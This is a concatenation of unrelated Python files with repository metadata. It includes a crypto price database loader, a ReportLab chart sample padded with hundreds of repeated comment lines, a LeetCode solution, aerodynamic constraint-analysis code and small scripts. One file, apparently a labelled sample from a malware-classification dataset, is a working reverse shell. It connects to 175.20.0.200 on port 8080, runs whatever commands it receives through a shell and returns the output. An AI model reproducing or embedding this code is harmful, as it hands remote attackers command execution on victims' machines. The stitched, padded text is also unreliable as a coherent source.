#selecting the last date time value from the database
my_cursor.execute(''' select count(*) from LINK; ''')
result = my_cursor.fetchall()
a = str(result).strip("(,)")
my_cursor.close()
try:
result = int((a))
except ValueError:
pass
print('LINK the database length is equal to :',result)
print('LINK the csv length is equal to:', len(data))
if result == 0 or result == None:
print('====LINK DATABASE IS EMPTY TIME TO POPULATE=======')
my_cursor = my_conn.cursor()
start1 = time.time()
#pushing data into the database from the CSV file
my_cursor.execute(''' LOAD DATA LOCAL INFILE '/home/nibbler/nibblerppman/nibbler/trading/collectors/coins/LINK/1m/LINK1m.csv' IGNORE INTO TABLE LINK
FIELDS TERMINATED BY ',' ENCLOSED BY '"'
LINES TERMINATED BY '\n'
IGNORE 1 LINES;''')
my_cursor.execute('SHOW WARNINGS')
my_conn.commit()
end1 = time.time()
my_cursor.close()
my_cursor = my_conn.cursor()
#getting the length of the database file
my_cursor.execute(''' select COUNT(*) FROM LINK; ''')
Clean_results = my_cursor.fetchall()
Clean_results = str(Clean_results).strip("(,)")
Clean_results = int(Clean_results)
my_cursor.close()
print('total values pushed', Clean_results)
print('=====PUSHED ENTIRE HISTORY IN:', end1-start1)
if Clean_results != len(data):
print('something went wrong, probably a datta error')
gap = len(data) - result
if result < len(data) and result > 0:
print('this means we can a single value or we have a data error')
#if the result is less than the data by one
print('gap is equal to', gap,'therefore we need to push', gap, 'points to the database')
#get the last 20 candles
x = gap*-1
to_push = []
fuckyou = list(range(0,gap))
for i in fuckyou:
lastpoints = data.iloc[x][0], data.iloc[x][1], data.iloc[x][2], float(data.iloc[x][3]), float(data.iloc[x][4]), float(data.iloc[x][5]), float(data.iloc[x][6]), float(data.iloc[x][7])
print(lastpoints)
to_push.append(lastpoints)
x = x+1
y = 0
for i in to_push:
pair_1 = to_push[y][0]
pair_2 = to_push[y][1]
Date_Time = str(round(to_push[y][2], 0)) #need to change these value to equal that to the databse for each shitcoin
Open_price = str(round(to_push[y][3], 4))
High_price = str(round(to_push[y][4], 4))
Low_price = str(round(to_push[y][5], 4))
Close_price = str(round(to_push[y][6], 4))
Volume = str(round(to_push[y][7], 4))
y = y+1
start2 = time.time()
my_cursor = my_conn.cursor()
my_cursor.execute('INSERT INTO LINK VALUES (%s,%s,%s,%s,%s,%s,%s,%s)', (pair_1, pair_2, Date_Time, Open_price, High_price, Low_price, Close_price, Volume))
my_conn.commit()
end2 = time.time()
if result > len(data):
print('somLINKing went wrong, database is somehow longer than the csv, deleting all')
my_cursor = my_conn.cursor()
my_cursor.execute(''' DELETE FROM LINK; ''')
my_conn.commit()
my_cursor.close()
print('data has been wiped, will repopulate next update')
if result == len(data):
print('SAME LENGTH DO NOTHING')
print('LINKMAGIC DONE')
LINK() | [
"[email protected]"
]
| |
e246af544e6034e6529a229fa0c7a967c984b397 | 4bd555bc662b8182a2e7644976bfdb00ed5e1ebe | /PythonistaAppTemplate/PythonistaKit.framework/pylib/site-packages/reportlab/graphics/samples/stacked_column.py | dab8e32684f6ea7fd3144eb49b058d14b19b4968 | []
| no_license | fhelmli/homeNOWG2 | a103df1ef97194dec9501dbda87ec1f7c111fb4a | e794fd87b296544542fd9dc7ac94c981c6312419 | refs/heads/master | 2020-04-04T13:40:20.417769 | 2019-01-30T21:41:04 | 2019-01-30T21:41:04 | 155,970,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,047 | py | #import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#import pythonista
#Autogenerated by ReportLab guiedit do not edit
from reportlab.graphics.charts.legends import Legend
from reportlab.graphics.charts.barcharts import VerticalBarChart
from reportlab.graphics.shapes import Drawing, _DrawingEditorMixin, String
from reportlab.graphics.charts.textlabels import Label
from reportlab.graphics.samples.excelcolors import *
class StackedColumn(_DrawingEditorMixin,Drawing):
def __init__(self,width=200,height=150,*args,**kw):
Drawing.__init__(self,width,height,*args,**kw)
self._add(self,VerticalBarChart(),name='chart',validate=None,desc="The main chart")
self.chart.width = 115
self.chart.height = 80
self.chart.x = 30
self.chart.y = 40
self.chart.bars[0].fillColor = color01
self.chart.bars[1].fillColor = color02
self.chart.bars[2].fillColor = color03
self.chart.bars[3].fillColor = color04
self.chart.bars[4].fillColor = color05
self.chart.bars[5].fillColor = color06
self.chart.bars[6].fillColor = color07
self.chart.bars[7].fillColor = color08
self.chart.bars[8].fillColor = color09
self.chart.bars[9].fillColor = color10
self.chart.fillColor = backgroundGrey
self.chart.barLabels.fontName = 'Helvetica'
self.chart.valueAxis.labels.fontName = 'Helvetica'
self.chart.valueAxis.labels.fontSize = 7
self.chart.valueAxis.forceZero = 1
self.chart.data = [(100, 150, 180), (125, 180, 200)]
self.chart.groupSpacing = 15
self.chart.valueAxis.avoidBoundFrac = 1
self.chart.valueAxis.gridEnd = 115
self.chart.valueAxis.tickLeft = 3
self.chart.valueAxis.visibleGrid = 1
self.chart.categoryAxis.categoryNames = ['North', 'South', 'Central']
self.chart.categoryAxis.tickDown = 3
self.chart.categoryAxis.labels.fontName = 'Helvetica'
self.chart.categoryAxis.labels.fontSize = 7
self._add(self,Label(),name='Title',validate=None,desc="The title at the top of the chart")
self.Title.fontName = 'Helvetica-Bold'
self.Title.fontSize = 7
self.Title.x = 100
self.Title.y = 135
self.Title._text = 'Chart Title'
self.Title.maxWidth = 180
self.Title.height = 20
self.Title.textAnchor ='middle'
self._add(self,Legend(),name='Legend',validate=None,desc="The legend or key for the chart")
self.Legend.colorNamePairs = [(color01, 'Widgets'), (color02, 'Sprockets')]
self.Legend.fontName = 'Helvetica'
self.Legend.fontSize = 7
self.Legend.x = 153
self.Legend.y = 85
self.Legend.dxTextSpace = 5
self.Legend.dy = 5
self.Legend.dx = 5
self.Legend.deltay = 5
self.Legend.alignment ='right'
self._add(self,Label(),name='XLabel',validate=None,desc="The label on the horizontal axis")
self.XLabel.fontName = 'Helvetica'
self.XLabel.fontSize = 7
self.XLabel.x = 85
self.XLabel.y = 10
self.XLabel.textAnchor ='middle'
self.XLabel.maxWidth = 100
self.XLabel.height = 20
self.XLabel._text = "X Axis"
self._add(self,Label(),name='YLabel',validate=None,desc="The label on the vertical axis")
self.YLabel.fontName = 'Helvetica'
self.YLabel.fontSize = 7
self.YLabel.x = 12
self.YLabel.y = 80
self.YLabel.angle = 90
self.YLabel.textAnchor ='middle'
self.YLabel.maxWidth = 100
self.YLabel.height = 20
self.YLabel._text = "Y Axis"
self.chart.categoryAxis.style='stacked'
self._add(self,0,name='preview',validate=None,desc=None)
if __name__=="__main__": #NORUNTESTS
StackedColumn().save(formats=['pdf'],outDir=None,fnRoot='stacked_column')
| [
"[email protected]"
]
| |
7ce3e7e2038833d38156599981f270e711b011b1 | f5d4863b6a62ef19ffc98e4f94f6ade1bc8810d3 | /Math/367_Valid_Perfect_Square.py | a0388e81d9425056f254fc88419d9f743ed97c3e | []
| no_license | xiaomojie/LeetCode | 138808eb83938f9bd3c2e8a755d908509dff0fd3 | eedf73b5f167025a97f0905d3718b6eab2ee3e09 | refs/heads/master | 2021-06-12T09:26:01.257348 | 2019-10-23T10:41:06 | 2019-10-23T10:41:06 | 76,184,467 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | """
求给定的num是否是一个数的平方。
牛顿迭代法求平方根:
设r是函数y=f(x)的根,使用牛顿迭代法,给定一个初始值x0,过x0做切线,y = f(x0) + f'(x0)(x-x0),求
该切线与x轴的交点x1 = x0 - f(x0)/f'(x0),称x1为r的一次近似值,再过(x1,f(x1))做切线。以此循环下去
所以迭代公式为:xn+1 = xn - f(xn)/f'(xn)
对于求平方根,x^2 - n = 0, 可看做函数 f(x) = y = x^2 - n,f'(x) = 2x, 则迭代公式为:
xn+1 = xn - (xn^2 - n)/(2*xn) = xn - xn/2 + n/(2xn) = 1/2(xn + n/xn)
"""
class Solution(object):
def isPerfectSquare1(self, num):
"""
:type num: int
:rtype: bool
"""
r = num
while r * r > num:
r = (r + num//r)//2
return r * r == num
# 法二:A square number is 1+3+5+7+...
def isPerfectSquare(self, num):
i = 1
while num > 0:
num -= i
i += 2
return num == 0
| [
"[email protected]"
]
| |
2c0cf2b46fe03109d5b7538f2b181faa0c18b80b | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/virus/sample_bad190.py | b096d9fe7ec9f3748275958a6e172021d34f49a2 | []
| no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | import subprocess
import hmac
import crypt
import hashlib
import zlib
import lzma
import threading
import bz2
import zipfile
import socket
import tarfile
import gzip
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
| [
"[email protected]"
]
| |
199e2fddf75cc9277b94c8b9a7376bad6d387ac5 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2718/60652/241534.py | 867df002441925aee0423dd0522251ff896ef573 | []
| no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | l=list("".join(input()))
s= input().replace(',', '').replace('[', '').replace(']', '')
index=0
while index<len(s):
tmp=l[int(s[index])]
l[int(s[index])]=l[int(s[index+1])]
l[int(s[index+1])]=tmp
index+=2
print("".join(str(i) for i in l)) | [
"[email protected]"
]
| |
1004513e523a8b184e8173e8b69e9a53a562c1fa | 00c6ded41b84008489a126a36657a8dc773626a5 | /.history/Sizing_Method/ConstrainsAnalysis/ConstrainsAnalysis_20210714170213.py | eae24aaa6aeaeaa15be715ad62f451d4bb3f3610 | []
| no_license | 12libao/DEA | 85f5f4274edf72c7f030a356bae9c499e3afc2ed | 1c6f8109bbc18c4451a50eacad9b4dedd29682bd | refs/heads/master | 2023-06-17T02:10:40.184423 | 2021-07-16T19:05:18 | 2021-07-16T19:05:18 | 346,111,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,537 | py | # author: Bao Li #
# Georgia Institute of Technology #
import sys
import os
sys.path.insert(0, os.getcwd())
import numpy as np
import matplotlib.pylab as plt
import Sizing_Method.Other.US_Standard_Atmosphere_1976 as atm
import Sizing_Method.Aerodynamics.ThrustLapse as thrust_lapse
import Sizing_Method.Aerodynamics.Aerodynamics as ad
"""
The unit use is IS standard
"""
class ConstrainsAnalysis_Mattingly_Method:
"""This is a power-based master constraints analysis"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0, C_DR=0):
"""
:param tau: power fraction of i_th power path
:param beta: weight fraction
:param K1: drag polar coefficient for 2nd order term
:param K2: drag polar coefficient for 1st order term
:param C_D0: the drag coefficient at zero lift
:param C_DR: additional drag caused, for example, by external stores,
braking parachutes or flaps, or temporary external hardware
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
self.beta = beta
self.hp = Hp
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
self.K1 = ad.aerodynamics_without_pd(self.h, self.v).K1()
self.K2 = ad.aerodynamics_without_pd(self.h, self.v).K2()
self.C_D0 = ad.aerodynamics_without_pd(self.h, self.v).CD_0()
self.C_DR = C_DR
self.W_S = wing_load
self.g0 = 9.80665
self.coeff = (1-self.hp) * self.beta / self.alpha
def master_equation(self, n, dh_dt, dV_dt):
q = 0.5 * self.rho * self.v ** 2
linear_term = self.K1 * n ** 2 * self.beta / q
inverse_term = (self.C_D0 + self.C_DR) * q / self.beta
constant_term = self.K2 * n + dh_dt / self.v + dV_dt / self.g0
# print(linear_term,'\n', inverse_term, '\n', constant_term)
P_WTO = self.coeff * (linear_term * self.W_S + inverse_term / self.W_S + constant_term) * self.v
return P_WTO
def cruise(self):
P_WTO = ConstrainsAnalysis_Mattingly_Method.master_equation(self, n=1, dh_dt=0, dV_dt=0)
return P_WTO
def climb(self, roc):
P_WTO = ConstrainsAnalysis_Mattingly_Method.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return P_WTO
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 300 knots, which is about 150 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
P_WTO = ConstrainsAnalysis_Mattingly_Method.master_equation(self, n=load_factor, dh_dt=0, dV_dt=0)
return P_WTO
def take_off(self):
"""
A320neo take-off speed is about 150 knots, which is about 75 m/s
required runway length is about 2000 m
K_TO is a constant greater than one set to 1.2 (generally specified by appropriate flying regulations)
"""
Cl_max_to = 2.3 # 2.3
K_TO = 1.2 # V_TO / V_stall
s_G = 1266
P_WTO = 2 / 3 * self.coeff * self.beta * K_TO ** 2 / (s_G * self.rho * self.g0 * Cl_max_to) * self.W_S ** (
3 / 2)
return P_WTO
def stall_speed(self):
V_stall_to = 65
V_stall_ld = 62
Cl_max_to = 2.32
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * Cl_max_to
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * Cl_max_ld
W_S = min(W_S_1, W_S_2)
return W_S
def service_ceiling(self, roc=0.5):
P_WTO = ConstrainsAnalysis_Mattingly_Method.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return P_WTO
allFuncs = [stall_speed, take_off, cruise,
service_ceiling, level_turn, climb]
class ConstrainsAnalysis_Gudmundsson_Method:
"""This is a power-based master constraints analysis based on Gudmundsson_method"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0, e=0.75, AR=10.3):
"""
:param tau: power fraction of i_th power path
:param beta: weight fraction
:param e: wing planform efficiency factor is between 0.75 and 0.85, no more than 1
:param AR: wing aspect ratio, normally between 7 and 10
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.beta = beta
self.w_s = wing_load
self.g0 = 9.80665
self.hp = Hp
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
self.q = 0.5 * self.rho * self.v ** 2
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
h = 2.43 # height of winglets
b = 35.8
ar_corr = AR * (1 + 1.9 * h / b) # equation 9-88, If the wing has winglets the aspect ratio should be corrected
self.k = 1 / (np.pi * ar_corr * e)
self.coefficient = (1-self.hp) * self.beta * self.v / self.alpha
# TABLE 3-1 Typical Aerodynamic Characteristics of Selected Classes of Aircraft
self.cd_min = 0.02
self.cd_to = 0.03
self.cl_to = 0.8
self.v_to = 68
self.s_g = 1480
self.mu = 0.04
def cruise(self):
p_w = self.q * self.cd_min / self.w_s + self.k / self.q * self.w_s
return p_w * self.coefficient
def climb(self, roc):
p_w = roc / self.v + self.q * self.cd_min / self.w_s + self.k / self.q * self.w_s
return p_w * self.coefficient
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 100 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
q = 0.5 * self.rho * v ** 2
p_w = q * (self.cd_min / self.w_s + self.k * (load_factor / q) ** 2 * self.w_s)
return p_w * self.coefficient
def take_off(self):
q = self.q / 2
p_w = self.v_to ** 2 / (2 * self.g0 * self.s_g) + q * self.cd_to / self.w_s + self.mu * (
1 - q * self.cl_to / self.w_s)
return p_w * self.coefficient
def service_ceiling(self, roc=0.5):
"""
t_w = 0.3
s = 124
cd_max = 0.04
l = 0.5 * self.rho * self.v ** 2 * s * self.w_s / self.q
d_max = 0.5 * self.rho * self.v ** 2 * s * cd_max
# equation 18-24: Airspeed for Best ROC for a Jet
vy = (t_w * self.w_s / (3 * self.rho * self.cd_min) * (1 + (1 + 3 / (l * d_max ** 2 * t_w ** 2)) ** 0.5)) ** 0.5
q = 0.5 * self.rho * vy ** 2
p_w = roc / self.v + q / self.w_s * (self.cd_min + self.k * (self.w_s / q) ** 2)
"""
p_w = roc / (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5 + 4 * (
self.k * self.cd_min / 3) ** 0.5
return p_w * self.coefficient
def stall_speed(self, V_stall_to=65, Cl_max_to=2.32):
V_stall_ld = 62
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * Cl_max_to
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * Cl_max_ld
W_S = min(W_S_1, W_S_2)
return W_S
allFuncs = [stall_speed, take_off, cruise,
service_ceiling, level_turn, climb]
if __name__ == "__main__":
n = 250
w_s = np.linspace(100, 9000, n)
constrains_name = ['take off', 'stall speed', 'cruise', 'service ceiling', 'level turn @3000m',
'climb @S-L', 'climb @3000m', 'climb @7000m']
constrains = np.array([[0, 68, 0.988], [0, 80, 1], [11300, 230, 0.948],
[11900, 230, 0.8], [3000, 100, 0.984], [0, 100, 0.984],
[3000, 200, 0.975], [7000, 230, 0.96]])
color = ['c', 'k', 'b', 'g', 'y', 'plum', 'violet', 'm']
m = constrains.shape[0]
p_w = np.zeros([2 * m, n])
plt.figure(figsize=(12, 8))
for i in range(m):
for j in range(n):
h = constrains[i, 0]
v = constrains[i, 1]
beta = constrains[i, 2]
problem1 = ConstrainsAnalysis_Gudmundsson_Method(h, v, beta, w_s[j])
problem2 = ConstrainsAnalysis_Mattingly_Method(h, v, beta, w_s[j])
if i >= 5:
p_w[i, j] = problem1.allFuncs[-1](problem1, roc=15 - 5 * (i - 5))
p_w[i + m, j] = problem2.allFuncs[-1](problem2, roc=15 - 5 * (i - 5))
else:
p_w[i, j] = problem1.allFuncs[i](problem1)
p_w[i + m, j] = problem2.allFuncs[i](problem2)
if i == 0:
pa, = plt.plot(p_w[i, :], np.linspace(0, 250, n), color=color[i], label=constrains_name[i])
pb, = plt.plot(p_w[i + m, :], np.linspace(0, 250, n), color=color[i], linestyle='--')
l1 = plt.legend([pa, pb], ['Gudmundsson method', 'Mattingly method'], loc="upper right")
else:
plt.plot(w_s, p_w[i, :], color=color[i], label=constrains_name[i])
plt.plot(w_s, p_w[i + m, :], color=color[i], linestyle='--')
p_w
p_w[0, :] = 10 ** 10 * (w_s - p_w[1, 2])
p_w
p_w[ m, :] = 10 ** 10 * (w_s - p_w[1 + m, 2])
plt.fill_between(w_s, np.amax(p_w[0:m, :], axis=0), 200, color='b', alpha=0.25,
label='feasible region Gudmundsson')
plt.fill_between(w_s, np.amax(p_w[m:2 * m-1, :], axis=0), 200, color='r', alpha=0.25,
label='feasible region Mattingly')
plt.plot(6012, 72, 'r*', markersize=10, label='True Conventional')
plt.xlabel('Wing Load: $W_{TO}$/S (N/${m^2}$)')
plt.ylabel('Power-to-Load: $P_{SL}$/$W_{TO}$ (W/N)')
plt.title(r'Constraint Analysis: $\bf{without}$ $\bf{DP}$ - Normalized to Sea Level')
plt.legend(bbox_to_anchor=(1.002, 1), loc="upper left")
plt.gca().add_artist(l1)
plt.xlim(100, 9000)
plt.ylim(0, 200)
plt.tight_layout()
plt.grid()
plt.show()
| [
"[email protected]"
]
| |
4168c9aca8547d6a3efc4a82c8b4fcdd1f820471 | 91365d8ef539a9952f048e1fef03b6f76a0ccf60 | /torch/onnx/_internal/fx/__init__.py | a3037f1cf29a2b678ab4e418fd1c190f9402063f | [
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
]
| permissive | ppwwyyxx/pytorch | 6e68cd816e8197e298c50d7f0e82cc97aff4dbdf | 2883cb464810611c5de37b2ca06771582ddf5f83 | refs/heads/master | 2023-08-10T00:39:48.165007 | 2023-06-07T01:51:59 | 2023-06-07T01:51:59 | 160,557,191 | 3 | 3 | NOASSERTION | 2018-12-05T17:53:38 | 2018-12-05T17:53:37 | null | UTF-8 | Python | false | false | 170 | py | from .context import FxToOnnxContext
from .serialization import save_model_with_external_data
__all__ = [
"save_model_with_external_data",
"FxToOnnxContext",
]
| [
"[email protected]"
]
| |
368092fc9f933ed1677b7069f0f8572a37fb26ea | a7288d7cce714ce3ddf3de464f959a2cb6c62e80 | /Django_Intro/bin/sqlformat | 65622073bec5cc8bc536e3d99a8912fd7b304755 | []
| no_license | jhflorey/Python | 94d898c9cfa05a941e0ac0c3506587ad494b76ab | 4d005000bb95ee4414a6aebef4cebdcbc13e4d99 | refs/heads/master | 2020-03-20T10:44:00.560147 | 2018-06-14T16:48:49 | 2018-06-14T16:48:49 | 137,382,015 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | #!/Users/jhflorey/Documents/Dojo/Python/Django_Intro/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from sqlparse.__main__ import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
]
| ||
e9646a505a34ad7b3d5267374dee42582cbb4105 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/1783.py | 846a90ebdfa5cca0aac4e9db0be2a33b1dc410f9 | []
| no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 786 | py | ii = [('CookGHP3.py', 21), ('SadlMLP.py', 1), ('WilbRLW.py', 29), ('RennJIT.py', 1), ('ProuWCM.py', 2), ('AubePRP2.py', 7), ('UnitAI.py', 1), ('WilbRLW5.py', 1), ('MarrFDI3.py', 1), ('PeckJNG.py', 2), ('AubePRP.py', 35), ('FitzRNS3.py', 2), ('WilbRLW2.py', 2), ('ClarGE2.py', 74), ('CarlTFR.py', 5), ('AdamHMM.py', 1), ('RoscTTI2.py', 1), ('CrokTPS.py', 5), ('ClarGE.py', 30), ('LyelCPG.py', 55), ('DaltJMA.py', 1), ('WestJIT2.py', 1), ('WadeJEB.py', 7), ('WheeJPT.py', 2), ('MereHHB3.py', 6), ('HogaGMM.py', 3), ('MartHRW.py', 1), ('WestJIT.py', 6), ('CoolWHM3.py', 2), ('FitzRNS.py', 1), ('StorJCC.py', 9), ('WilbRLW3.py', 2), ('ClarGE3.py', 36), ('FitzRNS2.py', 2), ('HogaGMM2.py', 3), ('EvarJSP.py', 19), ('DwigTHH.py', 4), ('SadlMLP2.py', 5), ('LyelCPG3.py', 4), ('DibdTBR.py', 1)] | [
"[email protected]"
]
| |
3b0bb11732c17bc4fc7df9419413a488fbd43761 | 149364d3e923ac89990be782a4a8464f4f7f0377 | /number_reader.py | ef7c215a47a06c4bd943587aa979b95b81be8457 | []
| no_license | laboyd001/python-crash-course-ch10 | dec44a1a81dc20931f4cc22e6ab6da0d6716895a | b42aadc9aafc422ffd1e99035c8519cae02ebdba | refs/heads/master | 2020-04-13T20:25:42.502954 | 2018-12-28T16:27:37 | 2018-12-28T16:27:37 | 163,429,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | #reads the list back from the json file
import json
filename = 'numbers.json'
with open(filename) as f_obj:
numbers = json.load(f_obj)
print(numbers) | [
"[email protected]"
]
| |
